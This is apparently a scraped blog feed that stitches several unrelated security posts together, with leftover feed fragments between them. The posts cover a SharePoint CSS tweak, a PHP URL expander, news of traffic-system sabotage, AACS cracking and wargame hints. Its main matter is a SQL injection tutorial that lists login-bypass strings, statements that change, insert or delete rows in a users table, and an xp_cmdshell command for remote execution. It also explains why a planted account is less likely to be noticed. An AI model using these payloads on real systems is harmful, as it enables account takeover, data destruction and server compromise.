Because SharePoint ignores common web standards and uses Ids with periods I had to escape the Id. CSS will treat the periods as a class declaration if they are not escaped.
To use this simply add the code snippet to your main CSS file or your master page in SharePoint. If this code snippet doesn’t work for you verify that the Id’s are the same in your SharePoint installation.
1 2 3 4 5 | #ctl00_PlaceHolderMain_UploadDocumentSection_ctl03_UploadMultipleLink, #Ribbon\.Documents\.New\.AddDocument\.Menu\.Upload\.UploadMultiple-Menu32 { display: none; } |
Below is a sample php function that expands URLs. As you can see the function is extremely simple and only takes two lines of code (the rest of the code is a use example). I hope large sites will adopt similar functionality before novice users become accustomed to blindly clicking obfuscated links.
]]><?php
$url = “http://bit.ly/4t9IYV”;
$fullURL = expandURL($url);
echo “Short URL: $url”;
echo “Original URL:”.$fullURL;function expandURL( $url )
{
$fullURL = get_headers($url,1);
return $fullURL['Location'];
}
?>
SQL injection points occur anytime user inputs are not properly cleansed. The most common points of attack are login pages, search pages and URL strings. Attacks are not limited to these points of entry. All user input needs to be correctly cleansed to prevent SQL injection attacks.
SQL injections a simple in theory in which the attack finds an input that is trusted and passed to the SQL server. When the attacker finds a vulnerable input it is time to force the SQL query to return true no matter what the programmer is trying to do.
The most common way to force a SQL statement to return true is to add OR 1=1– to a vulnerable input.
Code:
‘ OR 1=1′
Explanation:
‘ : Closes the string that the vulnerable input is looking for.
OR : a logical expression to start allow for another statement. The OR means that if the first statement fails because of the empty entry the entire statement may evaluate to true if the second statement is true.
1=1 : Since 1 will always equal 1 this expression will evaluate to true.
– : Is a comment which forces SQL to ignore everything after the – (dash dash).
Here are a few variations along the same lines as above:
| admin’– ‘ | or 0=0 – |
| ” or 0=0 – | or 0=0 – |
| ‘ or 0=0 # “ | or 0=0 # |
| or 0=0 # ‘ | or ‘x’='x |
| ” or “x”=”x ‘) | or (‘x’='x |
| ‘ or 1=1– “ | or 1=1– |
| or 1=1– ‘ | or a=a– |
| ” or “a”=”a ‘) | or (‘a’='a |
| “) or (“a”=”a hack” | or “a”=”a |
| hack” or 1=1 — hack’ | or 1=1 – |
| hack’ or ‘a’='a hack’) | or (‘a’='a |
| hack”) | or (“a”=”a |
The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample shows how a password can be changed if the table name and an account are know.
Code:
‘; UPDATE ‘users’ SET ‘password’ = ‘hacked’ WHERE username=’crackable’–
The above code updates the users table where the username is crackable. SET states that the password field for the username crackable will be changed to hacked.
Inserting data into a database is very similar to updating the table. As with the Update this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example expects that the attacker knows the table and a general structure of the table.
Code:
‘; INSERT INTO ‘users’ (‘id’, ‘username’, ‘password’, ‘details’) VALUES (1203, ‘myaccount’, ‘mypassword’, ‘NA’)–
The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating new accounts is less likely to be detected than changing the password of an existing account. If enough table information can be gained to insert a new account in the users database, it is preferred over updating an existing account. If table information cannot be obtained the next best thing would be to change a users password with an update.
Deleting data from a database is very similar to updating and inserting data in a database table. As with the update and the insert this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know the table name.
Code:
‘; DELETE FROM ‘users’ –
The above code sample deletes all the data from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. This command will be discovered very quickly when users are unable to log into the website.
SQL injections can be very powerful. This is an example of a SQL injection attack that can lead to remote execution. The default installation of MS SQL Server runs as local system, which is the same as Administrator. With the follow code stored procedures like master..xp_cmdshell can be executed which would allow and attacker to perform remote executions as if on the box.
Code:
‘; exec master..xp_cmdshell ‘ping 104.12.45.25′–
The semi colon in the statement will end the current SQL query and then allow a new SQL command. To verify that the command executed successfully, a packet sniffer can be used to sniff ICMP packets on 104.12.45.25. If packets are received at 104.12.45.25 from the SQL server the stored procedure was executed successfully.
]]>Read the [...]]]>
Read the full article here.
]]>Ericka Chickowski Jan 9 2007 18:29
Two Los Angeles municipal [...]]]>
]]>Ericka Chickowski Jan 9 2007 18:29
Two Los Angeles municipal traffic engineers were arraigned and charged with hacking city systems to disable traffic lights, all in connection with a labor dispute.
The two men, Gabriel Murillo and Kartik Patel, were charged by the Los Angeles district attorney’s newly-formed High Technology Crimes Division. The district attorney alleged that the men illegally accessed the city’s Automated Traffic Surveillance Center last August and disconnected four signal control boxes at key intersections.
Murillo allegedly accessed the system and found a way to block other managers from fixing the changes. Prosecutors reported it took four days to repair the signals.
According to the DA’s office, the disruption occurred hours before a job action by members of the Engineers and Architects Association, a union representing employees, such as Murillo and Patel, that run the city’s traffic center.
“This amounts to sabotage and is not to be tolerated no matter what the dispute or cause,” Los Angeles District Attorney Steve Cooley said.
Click the “play” button below to watch the clip:
Muslix64 posted a link [...]]]>
Click the “play” button below to watch the clip:
Muslix64 posted a link to his source code at the Doom9 forum.
According to reports, the software is rough and only supports a handful of HD DVD titles, but it does seem to bypass the AACS protection. The software enables users to “backup” high-def video from HD-DVD and Blu-Ray discs to a hard drive. Playback reliably of saved files has not been confirmed.
As a movie collector I am hoping the MPAA will learn that Copy Protection is not working. It is a long shot but maybe the MPAA will look at what customers want, which is not Copy Protection, and offer open media at reasonable prices. This would allow customers to backup purchased media and freely add it to a home theater PC or iPod without cracking the Copy Protection. I know this is a long shot, but I am hopefully. I believe this will not increase piracy and will have a positive effect on profits.
]]>After reviewing the list I noticed that I used several of the tools. Most of the tools tend to be either free or open source. It is not realistic for me to learn and master all 100 tools. I plan to move down the list one at a time starting at 1 and go to 25. This will allow me to master the popular tools and keep up with changes in the industry.
]]>This time Network Security sam has saved the unencrypted level7 password in an obscurely named file saved in this very directory.In other unrelated news, Sam has set up a script that returns the output from the UNIX cal command. Here is the script:Enter the year you wish to [...]]]>
This time Network Security sam has saved the unencrypted level7 password in an obscurely named file saved in this very directory.In other unrelated news, Sam has set up a script that returns the output from the UNIX cal command. Here is the script:Enter the year you wish to view and hit ‘view’.
This is a fun little level it shows how you can inject unix commands into poorly written perl scripts. What Sam has done is created an obscurely name php script that holds an unencrypted password. Sam is showing off his talent by creating a calendar program written in perl. When used correctly the perl script returns a calendar for the year you type in the text box.
Hint: You will need more than one UNIX command to pass this level. Think about how you will enter more than one command and which commands you will need to use to list the files. You will need to change directories and list the files.
]]>Network Security Sam has encrypted his password. The encryption system is publically available and can be accessed with this form:
You have recovered his encrypted password. It is:e39h;;6=
Decrypt the password and enter it below to advance to the next level.
In this level Sam has changed several [...]]]>
Network Security Sam has encrypted his password. The encryption system is publically available and can be accessed with this form:
You have recovered his encrypted password. It is:e39h;;6=
Decrypt the password and enter it below to advance to the next level.
In this level Sam has changed several things. He has encrypted the password and we have some how gotten our hands on the encrypted password for this level. Sam has included an encryption form so you can test your password and see if it matches the encrypted password we have found.
Hint: Get yourself an ASCII table and use the encrypt form to crack the encryption. Type a sample password in the encryption form and use the results to figure out the crypto being used.
]]>